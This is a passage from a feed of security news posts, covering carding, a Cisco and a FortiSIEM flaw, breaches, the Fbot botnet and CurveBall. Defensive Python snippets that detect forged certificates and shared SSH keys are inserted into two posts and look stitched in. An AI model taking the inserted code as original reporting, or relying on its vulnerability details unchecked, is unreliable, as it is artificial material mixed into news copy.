“A Russian national pleaded guilty today to charges related to his operation of two websites devoted to the facilitation of payment card fraud, computer hacking and other crimes.” reads the press release published by the Department of Justice. “Aleksei Burkov, 29, pleaded guilty before Senior U.S. District Judge T.S. Ellis III to access device fraud and conspiracy to commit computer intrusion, identity theft, wire and access device fraud and money laundering.  Sentencing is scheduled for May 8, 2020.”

In court, Burkov admitted to running a second, invite-only website that also sold stolen payment data.

Sentencing is scheduled for May 8, 2020; Burkov faces a prison sentence of up to 15 years.

Pierluigi Paganini

(SecurityAffairs – Burkov, hacking)

The post Russian operator of Cardplanet carding site pleads guilty in the US appeared first on Security Affairs.

Cisco fixes critical issue in Cisco Firepower Management Center

Cisco addressed a critical issue in the Cisco Firepower Management Center (FMC) that could allow a remote attacker to bypass authentication and execute arbitrary actions.

Cisco fixed a critical vulnerability in the Cisco Firepower Management Center that could allow a remote attacker to gain administrative access to the web-based management interface of vulnerable devices and execute arbitrary actions. The vulnerability, tracked as CVE-2019-16028, received a CVSS score of 9.8.

“A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.” reads the security advisory published by Cisco.

“The vulnerability is due to improper handling of Lightweight Directory Access Protocol (LDAP) authentication responses from an external authentication server. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to gain administrative access to the web-based management interface of the affected device.”

The issue, Cisco explains, stems from the improper handling of Lightweight Directory Access Protocol (LDAP) authentication responses from an external server. It can be triggered by sending crafted HTTP requests to a vulnerable device, granting administrative access to the web-based management interface.

Cisco warns that only Cisco Firepower Management Center deployments configured to authenticate users of the web-based management interface through an external LDAP server are affected.

“To determine whether external authentication using an LDAP server is configured on the device, administrators can navigate to System > Users > External Authentication and look for an External Authentication Object that uses LDAP as the authentication method. The External Authentication Object must be enabled for the FMC to be affected.” continues the advisory.

Cisco released FMC Software versions 6.4.0.7 and 6.5.0.2 to address the flaw; it also announced patches for versions 6.2.3 (6.2.3.16) and 6.3.0 (6.3.0.6) in February and May 2020, respectively.

The company confirmed that there are no workarounds that address this vulnerability, and that the issue does not affect Cisco Adaptive Security Appliance (ASA) Software or Cisco Firepower Threat Defense (FTD) Software.

Cisco is not aware of any attack in the wild exploiting the flaw.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Cisco fixes critical issue in Cisco Firepower Management Center appeared first on Security Affairs.

250 Million Microsoft customer support records and PII exposed online

An expert discovered that over 250 million Microsoft customer support records might have been exposed along with some personally identifiable information.

The popular researcher Bob Diachenko found an unprotected database containing over 250 million customer support records along with some personally identifiable information. The unprotected archive contained support requests submitted to the tech giant from 2005 to December 2019.

Diachenko reported his discovery to the company, which, after investigating the issue, admitted the data leak.

“Today, we concluded an investigation into a misconfiguration of an internal customer support database used for Microsoft support case analytics.” reads the post published by Microsoft. “While the investigation found no malicious use, and although most customers did not have personally identifiable information exposed, we want to be transparent about this incident with all customers and reassure them that we are taking it very seriously and holding ourselves accountable.”

Microsoft confirmed that “Customer Service and Support” (CSS) records were exposed online due to a misconfigured server containing logs of conversations between the support team and its customers.

Microsoft secured the database on December 31, 2019; it also added that it is not aware of any malicious use of the data.

Microsoft explained that the database was redacted using automated tools to remove the personally identifiable information of its customers, but in some sporadic cases this information was not removed because it did not follow a standard format.

Diachenko confirmed the presence of many records containing the following attributes:

  • Customer email addresses
  • IP addresses
  • Locations
  • Descriptions of CSS claims and cases
  • Microsoft support agent emails
  • Case numbers, resolutions, and remarks
  • Internal notes marked as “confidential”

The availability of detailed logs in the hands of crooks could expose Microsoft customers to the risk of tech support scams.

“Even though most personally identifiable information was redacted from the records, the dangers of this exposure should not be underestimated. The data could be valuable to tech support scammers, in particular.” explained Diachenko.

“Tech support scams entail a scammer contacting users and pretending to be a Microsoft support representative. These types of scams are quite prevalent, and even when scammers don’t have any personal information about their targets, they often impersonate Microsoft staff. Microsoft Windows is, after all, the most popular operating system in the world.”

Technical support logs frequently expose VIP clients and their internal architectures; such data could be used by cyber criminals to compromise the customers’ systems.

The company started notifying impacted customers. Below is the timeline of the data leak:

  • December 28, 2019 – The databases were indexed by search engine BinaryEdge
  • December 29, 2019 – Diachenko discovered the databases and immediately notified Microsoft.
  • December 30-31, 2019 – The tech giant secured the servers and data. Diachenko and Microsoft continued the investigation and remediation process.
  • Jan 21, 2020 – Microsoft disclosed additional details about the exposure as a result of the investigation.

Pierluigi Paganini

(SecurityAffairs – data leak, hacking)

The post 250 Million Microsoft customer support records and PII exposed online appeared first on Security Affairs.

Malware attack took down 600 computers at Volusia County Public Library

Systems supporting libraries in Volusia County were hit by a cyber attack; the incident took down 600 computers at Volusia County Public Library (VCPL) branches.

600 staff and public access computers were taken down at Volusia County Public Library (VCPL) branches in Daytona Beach, Florida, following a cyberattack. The attack started around 7 AM on January 9, 2020.

“The county’s technology staff were immediately notified and coordinated recovery efforts with library staff,” reads the official statement.

“Approximately 50 computers are back online, enabling library staff to perform patron business, such as checking books in and out, and making reservations.”

The library did not disclose the family of malware that infected its system, but experts believe that the computers were infected with ransomware.

The good news is that the cyber attack did not affect the ordinary operations of the Volusia County Public Library, and the website of the library was not impacted either. Public Wi-Fi in the library was also not impacted by the attack; according to the statement, “the public is able to safely use Wi-Fi within the libraries on personal devices.”

As a result of the incident, the computers at the library were not able to surf the web.

“The county is conducting an investigation and more information will be available at a later date,” VCPL staff also said.

“Some Californian libraries are also affected by a ransomware attack that encrypted computers at 26 community libraries in Contra Costa County on January 3.” reported BleepingComputer.

Pierluigi Paganini

(SecurityAffairs – Volusia County Library, hacking)

The post Malware attack took down 600 computers at Volusia County Public Library appeared first on Security Affairs.

Jeff Bezos phone was hacked by Saudi crown prince

The phone of the Amazon billionaire Jeff Bezos was hacked in 2018 after receiving a WhatsApp message from the personal account of the crown prince of Saudi Arabia.

In April 2019, Gavin de Becker, the investigator hired by Amazon chief Jeff Bezos to investigate the release of his intimate images, revealed that Saudi Arabian authorities had hacked Bezos’s phone to access his personal data.

Gavin de Becker explained that the hack was linked to the coverage of the murder of Saudi journalist Jamal Khashoggi by The Washington Post, the newspaper owned by Bezos.

Gavin de Becker investigated the publication in January of leaked text messages between Bezos and Lauren Sanchez, a former television anchor whom the National Enquirer tabloid newspaper said Bezos was dating.

Jeff Bezos hired Gavin de Becker & Associates to find out how his intimate text messages and photos had been obtained by the Enquirer.
Jeff Bezos accused the Enquirer publisher American Media Inc. of “blackmail” for threatening to publish the private photos if he did not stop the investigation. Bezos refused and decided to publicly disclose copies of the emails from AMI.

In an article for The Daily Beast website, De Becker wrote that the parent company of the National Enquirer, American Media Inc., had demanded that De Becker deny finding any evidence of “electronic eavesdropping or hacking in their newsgathering process.”

“Our investigators and several experts concluded with high confidence that the Saudis had access to Bezos’ phone, and gained private information,” de Becker wrote on The Daily Beast website.

Now The Guardian provides additional details on the spying, asserting that the intimate pictures were obtained through a sophisticated hacking operation directed by the crown prince of Saudi Arabia, Mohammad bin Salman.

According to anonymous sources of The Guardian, Bezos’ phone was hacked using a WhatsApp message from the personal account of bin Salman himself.

“The Amazon billionaire Jeff Bezos had his mobile phone “hacked” in 2018 after receiving a WhatsApp message that had apparently been sent from the personal account of the crown prince of Saudi Arabia, sources have told the Guardian.” reads the article published by The Guardian.

“The encrypted message from the number used by Mohammed bin Salman is believed to have included a malicious file that infiltrated the phone of the world’s richest man, according to the results of a digital forensic analysis.”

According to the sources, Bezos received a bait video file on May 1, 2018, that infected his mobile device. The malicious code was used to spy on Bezos, siphoning large amounts of data from his phone. The paper pointed out that at the time the relationship between Bezos and the prince was good and the two were exchanging friendly messages.

The revelation could have severe repercussions; first of all, it will complicate the position of Mohammad bin Salman, given his alleged involvement in the murder of Jamal Khashoggi at the Saudi embassy in Istanbul, Turkey, in October 2018.

Saudi Arabia has previously denied its involvement in the murder of Khashoggi that was attributed to a “rogue operation”. In December, a Saudi court convicted eight people of involvement in the murder after a secret trial that was criticised as a sham by human rights experts.

The revelation will have a significant impact on the business relationships of the Saudi “MBS” with western investors in Saudi Arabia.

Another aspect to evaluate is the impact on the personal relationship of Trump and his son-in-law Jared Kushner with the crown prince.

The US President has always ignored the warnings of US intelligence and has publicly expressed his dislike of Jeff Bezos.

The Guardian asked the Saudi embassy in Washington about the claims; a later message on Twitter rejected the accusations and labeled them “absurd”.

The UN has announced the imminent release of an investigation.

Pierluigi Paganini

(SecurityAffairs – Bezos, hacking)

The post Jeff Bezos phone was hacked by Saudi crown prince appeared first on Security Affairs.

OP Glowing Symphony – How US military claims to have disrupted ISIS ‘s propaganda

US military claims to have disrupted the online propaganda activity of the Islamic State (ISIS) in a hacking operation dating back at least to 2016.

In 2016, US Cyber Command carried out successful operations against the online propaganda of the Islamic State (ISIS); this is what emerged from declassified top-secret national security documents released on Tuesday.

The documents have been released under a Freedom of Information Act request.

According to the documents, US Cyber Command “successfully contested ISIS in the information domain,” and its operations had a significant impact on the terrorist organization's online radicalization and recruitment.

The first offensive hacking operation, dating back to 2016 and dubbed “Operation Glowing Symphony”, was detailed in the documents released by the National Security Archive at George Washington University.

“Today the National Security Archive is releasing 6 USCYBERCOM documents obtained through FOIA which shed new light on the campaign to counter ISIS in cyberspace.” reads a post published by the National Security Archive at George Washington University. “These documents, ranging from a discussion of assessment frameworks to the 120-day assessment of Operation GLOWING SYMPHONY, reveal the unprecedented complexity of the operation, resulting challenges in coordination and deconfliction, and assessments of effectiveness.”

ISIS OP Glowing Symphony

Operation Glowing Symphony was carried out in November 2016 by Joint Task Force Ares (JTF-Ares); it mainly aimed at disrupting ISIS propaganda efforts by hacking or hijacking online social media accounts and taking down websites used by the terrorist organization to spread propaganda.

The documents reveal the result of a 120-day assessment US Cyber Command conducted after the completion of Operation Glowing Symphony.

The assessment pointed out problems faced by the US cyber units, including the challenge of storing the huge amount of data contained in the hacked ISIS servers and accounts and the difficulty of coordinating with other coalition members and US government agencies.

Operation Glowing Symphony was approved in 2016 by President Barack Obama. It was initially approved for a 30-day period in late 2016, but it was later extended.

Operation GLOWING SYMPHONY is considered an important milestone in counter-terrorism efforts and demonstrates the effectiveness of the US offensive cyber capability against the online propaganda of the Islamic State (ISIS).

“Operation GLOWING SYMPHONY was originally approved for a 30-day window, but a July 2017 General Administrative Message reported the operation’s extension to an unknown date. Whether the operation is currently ongoing or not, it is public knowledge that JTF-ARES continues to operate.” continues the post. “It is also increasingly apparent that the counter-ISIS mission, JTF-ARES, and Operation GLOWING SYMPHONY are viewed within the US military’s cyber-warfighting community as not just a chapter in counter-terrorism and ‘low-intensity conflict’, but as demonstrations of the nation’s offensive cyber capability and a model for conducting an “American way” of cyber warfare.”

Pierluigi Paganini

(SecurityAffairs – OP Glowing Symphony, ISIS)

The post OP Glowing Symphony – How US military claims to have disrupted ISIS ‘s propaganda appeared first on Security Affairs.

Yomi Hunter Catches the CurveBall

Yomi implements detection for CurveBall exploits and also supports CVE-2020-0601 exploit detection even for signed Powershell modules. 

The recent CurveBall vulnerability shook the Info-Sec community worldwide: a major vulnerability reported directly by the US National Security Agency.

Such an uncommon vulnerability reporter alerted the whole industry, and CVE-2020-0601 quickly conquered most of the headlines.

The reason for this unusual outreach is still not clear, but Microsoft, along with many experts in the industry, confirmed that it actually is an important vulnerability with real chances of being abused in the wild.

The Malware Threat behind CurveBall

There was a little misunderstanding during the first hours after the disclosure of CVE-2020-0601. Many system administrators and companies rushed to update internet-exposed machines, like web servers or gateways, worried about possible remote code execution and reviving the EternalBlue/WannaCry crisis in their minds.

Luckily, CurveBall is not the same type of issue. But, if this is true, how exactly can it impact IT infrastructure, and why did the NSA raise such an alarm?

What the NSA states is real: CVE-2020-0601 exposes companies to high risks. But it does so in a stealthier way and, differently from EternalBlue, not in a way that could be exploited by criminals and vandals for an Internet-wide CryptoWorm infection.

In fact, CurveBall enables attackers to trick Windows 10, Windows Server 2016 and Windows Server 2019 into accepting them as other trusted parties, such as Microsoft itself, so that the impersonation is successfully cryptographically verified by the vulnerable hosts.

Pragmatically, this means organizations relying on CVE-2020-0601-vulnerable cryptography implementations to protect their communication are at risk of man-in-the-middle attacks and impersonation in general. Even cryptographically signed files and emails are exposed to spoofing and tampering, violating core parts of the threat models most companies use to secure their businesses.

Is that all? No.

CurveBall also puts endpoints and security perimeters at risk due to its appeal for one of the most relevant threats to modern businesses: malware.

In fact, signed files equal signed malware in the modern threat panorama. Thus, several threat actors, both state-sponsored and cyber criminal, may well abuse the CurveBall vulnerability to fake Microsoft-signed executables, impersonating legitimate files and potentially tricking perimeter and endpoint security technologies that rely on the faulty Windows cryptographic validation.

Yomi Hunter Catches CVE-2020-0601

So, after evaluating the risks of CurveBall exploitation in the wild, especially considering the release of public tools that abuse the vulnerability to sign arbitrary files, we rolled out a new update of Yomi Hunter able to catch CurveBall exploit attempts.

Now, both private and public instances of the Yomi Sandbox are actively looking for CVE-2020-0601 exploits trying to evade traditional security controls. The new detection logic is available in the malware reports generated by the Yomi Hunter community (e.g. LINK), within the new VirusTotal integrated reports, and for every private instance in use by Yoroi’s Cyber Security Defence Center customers.

Figure. CVE-2020-0601 exploit on Yomi Hunter

But Yomi Hunter is not limited to hunting for Portable Executable files exploiting CurveBall. The cryptographic detection mechanism rolled out in the new update supports CVE-2020-0601 exploit detection even for signed PowerShell modules.
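As an added example, not Yomi Hunter's own detection logic nor Microsoft's code, the check below goes one step beyond the text: CVE-2020-0601 forgeries work because Windows CryptoAPI matched an ECC certificate to a cached trusted root by public key alone, so a forged certificate must carry explicit ECParameters instead of the namedCurve OID a legitimate CA certificate uses. The script walks a DER-encoded SubjectPublicKeyInfo and flags that hallmark; the sample inputs are constructed, not real keys.

```python
# Added example (not Yomi Hunter's or Microsoft's code).  A forged CurveBall
# certificate carries *explicit* ECParameters (a SEQUENCE with its own generator)
# where a genuine CA certificate carries a namedCurve OID.  The classifier below
# walks a DER SubjectPublicKeyInfo and reports which form it finds.
from typing import Tuple

ID_EC_PUBLIC_KEY = "1.2.840.10045.2.1"      # id-ecPublicKey (RFC 5480)
PRIME256V1 = "1.2.840.10045.3.1.7"          # secp256r1 / P-256
PRIME_FIELD = "1.2.840.10045.1.1"           # fieldType prime-field
TAG_INTEGER, TAG_BITSTRING, TAG_NULL, TAG_OID, TAG_SEQUENCE = 0x02, 0x03, 0x05, 0x06, 0x30


def der_length(n: int) -> bytes:
    """DER length octets (short or long form)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_encode(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + der_length(len(content)) + content


def encode_oid(dotted: str) -> bytes:
    """DER OBJECT IDENTIFIER from dotted form (first two arcs packed, base-128 rest)."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return der_encode(TAG_OID, bytes(out))


def decode_oid(content: bytes) -> str:
    arcs = [content[0] // 40, content[0] % 40]
    value = 0
    for b in content[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(str(a) for a in arcs)


def der_read(buf: bytes, pos: int = 0) -> Tuple[int, bytes, int]:
    """Read one TLV at pos; return (tag, content, position after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def classify_ec_spki(spki: bytes) -> str:
    """Classify the ECParameters of a SubjectPublicKeyInfo; 'explicit-parameters'
    is the CurveBall signal and deserves a block or an alert."""
    tag, content, _ = der_read(spki)
    if tag != TAG_SEQUENCE:
        raise ValueError("SubjectPublicKeyInfo must be a SEQUENCE")
    alg_tag, alg, _ = der_read(content)
    if alg_tag != TAG_SEQUENCE:
        raise ValueError("AlgorithmIdentifier must be a SEQUENCE")
    oid_tag, oid_content, after = der_read(alg)
    if oid_tag != TAG_OID or decode_oid(oid_content) != ID_EC_PUBLIC_KEY:
        return "not-ec"
    if after >= len(alg):
        return "missing-parameters"          # RFC 5480 requires them for id-ecPublicKey
    param_tag, param_content, _ = der_read(alg, after)
    if param_tag == TAG_OID:
        return "named-curve:" + decode_oid(param_content)
    if param_tag == TAG_SEQUENCE:
        return "explicit-parameters"
    return "implicit-curve" if param_tag == TAG_NULL else "unknown-parameters"


def build_sample_spki(explicit: bool) -> bytes:
    """Constructed SPKI with a dummy uncompressed point (not a real key).  The
    explicit variant carries only the version and fieldID members of ECParameters;
    a real forgery carries the full curve, but the classifier only needs the tag."""
    point = b"\x04" + b"\x11" * 32 + b"\x22" * 32
    if explicit:
        field_id = der_encode(TAG_SEQUENCE, encode_oid(PRIME_FIELD))
        params = der_encode(TAG_SEQUENCE, der_encode(TAG_INTEGER, b"\x01") + field_id)
    else:
        params = encode_oid(PRIME256V1)
    alg = der_encode(TAG_SEQUENCE, encode_oid(ID_EC_PUBLIC_KEY) + params)
    return der_encode(TAG_SEQUENCE, alg + der_encode(TAG_BITSTRING, b"\x00" + point))


if __name__ == "__main__":
    for name, flag in (("named-curve sample", False), ("explicit-parameter sample", True)):
        print(f"{name}: {classify_ec_spki(build_sample_spki(flag))}")
```

To run it against a real file, feed `classify_ec_spki` the DER bytes of the signer's SubjectPublicKeyInfo extracted from the certificate chain of a signed PE or PowerShell module.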

If you want to try Yomi: The Malware Hunter please register here!

Pierluigi Paganini

(SecurityAffairs – Curveball, hacking)

The post Yomi Hunter Catches the CurveBall appeared first on Security Affairs.

The Mystery of Fbot

A few days ago, the MalwareMustDie team’s security researcher unixfreaxjp published a new Linux malware analysis of Fbot, focused on the decryption of the latest encryption logic used by its bot client.

This is not the first time an Fbot analysis has been published, and Fbot binaries have been actively infecting IoT devices since well before 2018.

This article explains what we have learned about Fbot, traced back to 2014, and discusses the mysteries that can be seen after Fbot has been detected.

The background before Fbot Mirai variant

Fbot is one of Mirai’s variants. Mirai is the Linux malware originally detected in August 2016 by the same team that wrote the analysis mentioned above. After the leak of the Mirai source code by its coder (nickname: AnnaSenpai), and its open publication on GitHub within only a month of the analysis report, many young hackers involved in the “DDoS criminal ecosystem”, who had been actively using IoT devices for DDoS before Mirai was born, raced to learn how to install, adapt and transform Mirai into their DDoS botnet platforms. Most of those platforms had been built on the Kaiten, STD, GafGyt (also known as Qbot, Torlus or Bashlite) or Perlbot malware source code, while Mirai had proven to be more recently coded, to have more powerful flooding, and to include anti-reverse-engineering tricks.

This wave marks a significant step-up in DDoS botnet and IoT malware development.

It is known in the underground that Satori, the predecessor of the code now known as Fbot, was developed after the leak of the Mirai code by young botnet coders, most of whom were also herders of Qbot (GafGyt) botnets. One of them, living in the UK and known under the nicknames Vicious, ViciousAttack, Vi, Vamp, DustPan, NixFairy, HollySkye or RespectVicious, had allegedly been involved in this variant’s development too.

Fbot

(Figure 1 – Vamp’s account on Twitter)

Vamp was among a number of suspects arrested across the United Kingdom in the investigation of the TalkTalk cyber incident of 2015, and he is also a suspect in the activity of the Mirai botnet that caused great damage in several parts of the globe from 2016. Vamp, along with other “partners” (including Nexus Zeta, who has been indicted for a similar crime in the US), was involved in the original development of the Satori botnet. After the legal matter, Vamp went off the grid; the most recent news about him concerns the lifting of his anonymity in 2018, as reported by The Irish News in an article published on 14 March 2018, which we quote:

“With the criminal case now concluded, Mr Simpson said: ‘...this young man has now been dealt with, and he is now over 18 (years old).’ On that basis Mr Justice Maguire agreed to discharge the prohibition on identifying the teenager.”

The mystery of Fbot

What has happened now is the re-emergence of the Satori-based Mirai variant with the payload called Fbot.[.supported_architecture], which has been detected since September 2018 in several honeypot logs and has also been reported in the analysis we mentioned here.

Fbot

(Figure 2 – Fbot Scanning Activities with “SATORI” Keyword Detected)

The link between Fbot and the Satori base is visible in its infection activity and in its executable file. For example, in the scanner log:

And also in the binary as hardcoded strings:

Fbot

(Figure 3 – The Hardcoded “SATORI” Strings in Fbot Binary)

Could it be that one of the “partners” during Satori development renamed compiled binaries of the Satori project to Fbot? What are Vamp and Nexus Zeta doing nowadays? Or could it be that someone else is using the whole source code of the Satori project for his own purposes, naming the compiled binaries Fbot?

This is the mystery that came to our mind after reading the complete report in MalwareMustDie’s latest post.

To make things more mysterious, right now the Fbot-infected devices are still detected performing infection attempts against other IoT devices, but the payload is not being dropped from the C2 server.

The latest detection can also be seen in MalwareMustDie’s latest post:

Fbot

(Figure 4 – Recent Record of Fbot Infection Log In the Analysis Article)

The researchers have confirmed that, since the analysis was posted by MalwareMustDie, the Fbot C2 has not been dropping new payloads for further infection activity.

Would it mean that the coder of Fbot is abandoning his botnet after all this time?

Whoever the herder is, we all hope that the coder will stop his malicious activity for good.

Pierluigi Paganini

(SecurityAffairs – Fbot, malware)

The post The Mystery of Fbot appeared first on Security Affairs.

Expert found a hardcoded SSH Key in Fortinet SIEM appliances

An expert found a hardcoded SSH public key in Fortinet’s Security Information and Event Management product FortiSIEM that can allow access to the FortiSIEM Supervisor.

Andrew Klaus, a security specialist from Cybera, discovered a hardcoded SSH public key in Fortinet’s Security Information and Event Management product FortiSIEM that can be used by attackers to access the FortiSIEM Supervisor.

The expert discovered that Fortinet devices share the same SSH key for the user ‘tunneluser’, and that it is stored in plain text.

“FortiSIEM has a hardcoded SSH public key for user “tunneluser” which is the same between all installs. An attacker with this key can successfully authenticate as this user to the FortiSIEM Supervisor.” reads the security advisory. “The unencrypted key is also stored inside the FortiSIEM image. While the user’s shell is limited to running the /opt/phoenix/phscripts/bin/tunnelshell script, SSH authentication still succeeds.”

Fortinet published a security advisory for the issue that is tracked as CVE-2019-17659.

The vulnerability could be exploited by attackers to trigger a denial of service condition.

“A use of hard-coded cryptographic key vulnerability in FortiSIEM may allow a remote unauthenticated attacker to obtain SSH access to the supervisor as the restricted user “tunneluser” by leveraging knowledge of the private key from another installation or a firmware image.” reads the advisory.

The user ‘tunneluser‘ only runs in a restricted shell that lets only that user create tunnel connections from the supervisor to the originating IP.

The feature was implemented to enable connecting to collectors from the supervisor when there is a firewall between the collector and the supervisor.

Fortinet invites customers that are not using the reverse tunnel feature to disable SSH on port 19999, which only allows tunneluser to authenticate. Fortinet also advises customers to disable “tunneluser” SSH access on port 22.

Below the timeline of the vulnerability:

  • Dec 2, 2019: Email sent to Fortinet PSIRT with vulnerability details.
  • Dec 3, 2019: Automated reply from PSIRT that email was received.
  • Dec 23, 2019: Sent a reminder email to PSIRT about requesting a human confirmation.
  • Jan 3, 2019: Public Release.

The flaw affects FortiSIEM version 5.2.6 and below; the tech firm addressed it with the release of FortiSIEM version 5.2.7.
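The defect above is one authorized key for tunneluser that is identical on every install, so the private key from any image opens all of them. As an added example (not Fortinet's code, nor anything from the advisory), the audit below collects authorized_keys contents from several appliances, fingerprints every key the way ssh-keygen -lf does, and reports keys that appear on more than one host. The hostnames, key blobs and file contents are constructed; the location of the authorized_keys file on FortiSIEM is not stated on the page.

```python
# Added example (not Fortinet's code): find SSH public keys shared across a fleet.
import base64
import hashlib
from collections import defaultdict
from typing import Dict, List, Tuple


def build_fake_key(kind: str, seed: int) -> str:
    """Construct a syntactically valid but dummy OpenSSH public key (not a real key)."""
    body = seed.to_bytes(32, "big")
    blob = len(kind).to_bytes(4, "big") + kind.encode() + len(body).to_bytes(4, "big") + body
    return f"{kind} {base64.b64encode(blob).decode()}"


SHARED_TUNNEL_KEY = build_fake_key("ssh-ed25519", 0x1337)   # constructed: same on every install
ADMIN_KEY_A = build_fake_key("ssh-ed25519", 0xA)            # constructed: unique per host
ADMIN_KEY_B = build_fake_key("ssh-ed25519", 0xB)
ADMIN_KEY_C = build_fake_key("ssh-ed25519", 0xC)

# Constructed authorized_keys contents for three appliances (not real FortiSIEM data).
FLEET: Dict[str, str] = {
    "siem-sup-01": f"{ADMIN_KEY_A} admin@corp\n{SHARED_TUNNEL_KEY} tunneluser\n",
    "siem-sup-02": f"# managed file\n{SHARED_TUNNEL_KEY} tunneluser\n{ADMIN_KEY_B} ops@corp\n",
    "siem-sup-03": f'restrict,command="/bin/true" {SHARED_TUNNEL_KEY} tunneluser\n{ADMIN_KEY_C}\n',
}


def fingerprint(b64_blob: str) -> str:
    """SHA256 fingerprint in the form ssh-keygen -lf prints (unpadded base64)."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> List[Tuple[str, str, str]]:
    """Return (fingerprint, key_type, comment) per key line.

    Blank lines and comments are skipped; a leading options field such as
    restrict,command=... is tolerated by locating the key-type token."""
    keys = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        idx = next((i for i, p in enumerate(parts)
                    if p.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(parts):
            continue                       # malformed line: no key blob after the type
        comment = " ".join(parts[idx + 2:])
        keys.append((fingerprint(parts[idx + 1]), parts[idx], comment))
    return keys


def find_shared_keys(fleet: Dict[str, str]) -> Dict[str, Dict[str, object]]:
    """Map fingerprint -> {'hosts': sorted list, 'comments': set} for keys on >1 host."""
    seen = defaultdict(lambda: {"hosts": set(), "comments": set()})
    for host, text in fleet.items():
        for fp, _kind, comment in parse_authorized_keys(text):
            seen[fp]["hosts"].add(host)
            if comment:
                seen[fp]["comments"].add(comment)
    return {fp: {"hosts": sorted(v["hosts"]), "comments": v["comments"]}
            for fp, v in seen.items() if len(v["hosts"]) > 1}


if __name__ == "__main__":
    for fp, info in find_shared_keys(FLEET).items():
        print(f"{fp} present on {len(info['hosts'])} hosts {info['hosts']} as {info['comments']}")
```

A key that the report lists on every appliance with the same comment is the pattern to investigate: either an operator's key deliberately rolled out, or, as here, one baked into the image.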

Pierluigi Paganini

(SecurityAffairs – FortiSIEM, hacking)

The post Expert found a hardcoded SSH Key in Fortinet SIEM appliances appeared first on Security Affairs.

Mitsubishi Electric discloses data breach, media blame China-linked APT

Mitsubishi Electric disclosed a security breach that might have exposed personal and confidential corporate information.

Mitsubishi Electric disclosed a security breach that might have exposed personal and confidential corporate data. According to the company, attackers did not obtain sensitive information about defense contracts.

The breach was detected almost eight months ago, on June 28, 2019; the delay in disclosure is attributed to the increased complexity of the investigation, caused by the attackers deleting activity logs.

“On June 28, last year, a suspicious behavior was detected and investigated on a terminal in our company, and as a result of unauthorized access by a third party, data was transmitted to the outside,” reads a data breach notification published by the company.

The intrusion took place on June 28, 2019, and the company launched an investigation in September 2019. Mitsubishi Electric disclosed the security incident only after two local newspapers, the Asahi Shimbun and Nikkei, reported the security breach.

Mitsubishi Electric had also already notified members of the Japanese government and Ministry of Defense.

This morning, at a press conference, Yoshii Kan, a secretary-general of Japan, said that the company had reported the intrusion. Although Mitsubishi Electric is dealing with government agencies such as the Ministry of Defense, Mr. Kan said, “I was notified that it was confirmed that there was no leak of sensitive information such as defense equipment and electric power.”

“Mitsubishi Electric, a major general electronics maker, has been hit by a large-scale cyber attack, and it has been found that information about public and private business partners such as highly confidential defense-related and important social infrastructure such as electric power and railroad may leak out.” reported the Asahi Shimbun. “An internal survey found that computers and servers at headquarters and major sites were subject to numerous unauthorized accesses.”


The two media outlets attribute the cyber attack to a China-linked cyber espionage group tracked as Tick (aka Bronze Butler).

The hacker group has been targeting Japanese heavy industry, manufacturing and international relations at least since 2012.

According to the experts, the group is linked to the People’s Republic of China and is focused on exfiltrating confidential data.

“According to people involved, Chinese hackers Tick may have been involved. According to Mitsubishi Electric, “logs (to check for leaks) have been deleted and it is not possible to confirm whether or not they actually leaked.” reported the Nikkei.

“According to the company, at least tens of PCs and servers in Japan and overseas have been found to have been compromised. The amount of unauthorized access is approximately 200 megabytes, mainly for documents.”

The security breach was discovered after Mitsubishi Electric staff found a suspicious file on one of the company’s servers; further investigation allowed the company to determine that an employee account had been compromised.

According to the media, hackers gained access to the networks of around 14 company departments, including sales and the head administrative office. Threat actors stole around 200 MB of files including:

  • Personal information and recruitment applicant information (1,987) 
  • New graduate recruitment applicants who joined the company from October 2017 to April 2020, and experienced recruitment applicants from 2011 to 2016 and our employee information (4,566) 
  • 2012 Survey results regarding the personnel treatment system implemented for employees in the headquarters in Japan, and information on retired employees of our affiliated companies (1,569) 

“Exchanges with government agencies such as the Ministry of Defense, the Nuclear Regulatory Commission, the Agency for Natural Resources and Energy, the Cabinet Office, and the Ministry of the Environment,” as well as “transaction-related conference materials such as joint development with private companies such as electric power, railways, and telecommunications, and product orders” might also have been leaked.” reported Kyodo News.

The company is still investigating the security breach, but it seems that attackers have attempted to delete any evidence of the attack.

Mitsubishi Electric is going to report the incident to the affected customers.

“We are informing the affected customers of the possible breach of trade secrets,” states the company.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Mitsubishi Electric discloses data breach, media blame China-linked APT appeared first on Security Affairs.

NATO will send a counter-hybrid team to Montenegro to face Russia’s threat

The Chairman of the NATO Military Committee announced that the alliance has sent a counter-hybrid team to Montenegro to face Russian hybrid attacks.

Last week in Brussels, the Chairman of the NATO Military Committee (MC), Marshal Sir Stuart Peach, announced the effort of the Alliance in facing Russian hybrid attacks.

The term “Hybrid warfare” refers to a military strategy which employs political warfare and blends conventional warfare, irregular warfare and cyberwarfare with other influencing methods, such as fake news, diplomacy, lawfare and foreign electoral intervention.

Peach said that the NATO alliance had set up the first NATO counter-hybrid team in Montenegro.

“The first NATO counter-hybrid team has been deployed to our ally state, Montenegro, with the aim of helping to strengthen Montenegro’s capacities and deterring hybrid challenges”, Peach said.

